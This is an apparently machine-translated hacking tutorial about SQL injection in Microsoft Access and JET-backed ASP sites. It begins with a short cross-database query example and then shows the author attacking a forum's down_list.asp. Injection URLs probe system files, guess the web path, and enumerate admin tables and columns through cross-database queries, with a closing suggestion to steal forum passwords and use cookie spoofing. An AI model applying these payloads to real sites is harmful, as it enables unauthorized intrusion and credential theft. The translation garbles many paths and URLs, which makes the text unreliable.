Do cross-database queries require absolute paths?

Find something you want to discuss about not absolute paths!

Cross-database ACCESS is implemented through brackets, including path and password settings. The cross-database Connection is enabled on the premise that a Connection is enabled.

Problem description: sometimes it is necessary to obtain the required record set through related keywords in two or three database tables, which cannot be achieved using general SQL query statements, you can use the cross-database query function of ACCESS.

Solution: for example, the "admin" and "rain" tables are in different databases. The specific query method is as follows:
@ "Select * from admin as a inner join [; database =" + AppDomain. CurrentDomain. BaseDirectory + "rain. zc]. rain as B

ON a. BH = B. LXBH"

The SUPERHEI is not the absolute path of the first violent database, and then the cross-database is a little different from the discussion.

This cross-database seems to require two databases to be in the same directory. You can see this question, it is true that the cross-database query can find a lot of information at will. Unlike the previous one, you have to head on a lot of E-files. Today, I want to talk about a new method of cross-database query I found some time ago. You should listen carefully.

As shown in the following example, the phantom Brigade and the gray track discussed the problem about a month ago:

Http://www.target.com/show.asp? Id = 1 or 0 <> (select count (*) from admin. c)

The following error message is displayed:

Microsoft JET Database Engine error 80004005
The file C: WINNTsystem32admin. mdb is not found.

You can see that, if you have read the learning report written by xhacker, you will surely be excited, because the report vaguely mentions a vulnerability in ACCESS, which can be Dir C:/s! Let's continue and submit:

Http://www.target.com/show.asp? Id = 1 or 0 <> (select count (*) from c: oot. ini)

Return Value:

Microsoft JET Database Engine error 80004005
File c: oot. mdb is not found.

It looks like we can add a path to the part following from. If you want to pull dir, you need to pull cmd.exe, and then:

Http://www.target.com/show.asp? Id = 1 or 0 <> (select count (*) from c: winntsystem321_.exe. c)

Let's see the error message:

Microsoft JET Database Engine error 80004005
The unrecognized database format is c: winntsystem32CMD. EXE.

It seems that our hopes are lost. (After multiple practices, you can get the format of the file name following the from statement as follows: file name. suffix. any letter so that you can access the file name. the file with the suffix ). At this time, it seems that we can only determine whether a directory or a file exists. At that time, I thought it was a chicken-level vulnerability, just like many people thought it was boring and a pity.

Later, I checked the security of the forum for a friend one day and looked at the Yayi forum. First, I tried the default database name. Submit:

Bytes. However, because the extension is. asp, we still cannot download its database. No way, I had to go to the hard drive for half a day and read the code from the original Yayi forum. The result is an exciting one. Download The down_list.asp file of the plug-in the forum to find such a piece of code:

If request ("id") = "" then
Response. write "You have not selected any software. Please return"
Response. end
End if
Set rs = server. createobject ("adodb. recordset ")
SQL = "select

Dclass. class, DNclass. Nclass, download. showname, download. classid, download. Nclassid, download. lasthits, download. down

Show from download, Dclass, DNclass where download. classid = Dclass. classid and download. Nclassid = DNclass. Nclassid

And download. ID = "& request (" id ")

No, the & request ("id") variable is replaced by the query statement without any filtering. We can perform SQL injection! It is easy to say, but it is difficult to do it. submit the following URL:

(Select % 20 count (*) % 20 from % 20 admin "> http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20 admin)

Return to the page, OK. The admin table exists. Then confirm the column name for saving the User Name:

(Select % 20 count (*) % 20 from % 20 admin "> http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20 admin where username)

Also succeeded. Save the username column and check the password column again:

(Select % 20 count (*) % 20 from % 20 admin "> http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20 admin where password)

An error occurred. It's okay to have preparation. Try again. Finally, I tried all the column names I could think of. Since there was no correct one, it was my turn to be depressed. I asked the friend if he had processed the database, the answer is no. Open the default database. There are two databases under the DATA Directory, one of which is 1yabbs. asp (used for Forum), one is download. asp (used to download the system), open it and check that there is no password column in it! It looks like I have no fun. Later, when I was chatting with MM, I suddenly thought of how to use it (not to mention that I was not focused on chatting with MM :). In SQL injection, we sometimes use the "admin. id" statement, where admin is the table name and id is the column name. So can we take into account the chicken-rib vulnerability we discussed some time ago? Now, we have to practice it first. To use the method described at the beginning, we should first look for the WEB directory:

(Select % 20 count (*) % 20 from % 20c: webw. c. c "> http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20c: webw. c. c)

The following information is returned:

Microsoft JET Database Engine error 80004005
C: webw. c is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.
/Yabbs/down_list.asp, row 37

The directory is incorrect:

(Select % 20 count (*) % 20 from % 20d: webw. c. c "> http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20d: webw. c. c)

This prompt has changed:

Microsoft VBscript compiler error 8000a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft JET Database Engine error 80004005
File d: webw. c not found.

/Yabbs/down_list.asp, row 37

This prompt shows that files cannot be found. Oh, it's easy to guess if you know the WEB directory. Submit again:

(Select % 20 count (*) % 20 from % "> http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20d: webyabbsdatayabbs. asp. c)

This OK time, I directly guessed the specific path, but the prompt is exactly the same as my idea. It is really ##@ @ (at this time, I am excited for 10 seconds ......)
The returned information is:

Microsoft VBscript compiler error 8000a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft JET Database Engine error 80040e37
The Microsoft Jet Database Engine cannot find the input table or query c. Check whether it exists and whether its name is correctly spelled.

Now everything is simplified. Submit the query statement to determine the table and column name.

(Select % 20 count (*) % 20 from % "> (select % 20 count (*) % 20 from %"> http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20d: webyabbsdatayabbs. asp. admin % 20 where % 20 username)

If it is displayed successfully, the admin table and username column exist in the Database 1yabbs. asp. Then query the ID value and submit the following URL:

(Select % 20 count (*) % 20 from % "> http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20d: webyabbsdatayabbs. asp. admin % 20 where % 20id = 1)

The page is displayed successfully. Now I don't need to talk about anything. Everyone will do it. The following part is for you.

What can we do in the above analysis process? In the face of a large site, you know the name of the database (for example, the content mentioned in the previous article on the mobile network explosion Library Vulnerability that I wrote, and the database name of the mobile network forum is obtained, however, his database cannot be downloaded, and the program does not have other known Injection Vulnerabilities .) We can try to use the SQL injection vulnerability of other programs in that station for cross-database query. First, we can guess the WEB path and then perform cross-database query to get the password of the Forum, then, you can get the front-end permission by performing COOKIE spoofing. There are a lot of places to use. You can explore it by yourself. After all, to turn others' technologies into your own, you must expand others' ideas to study.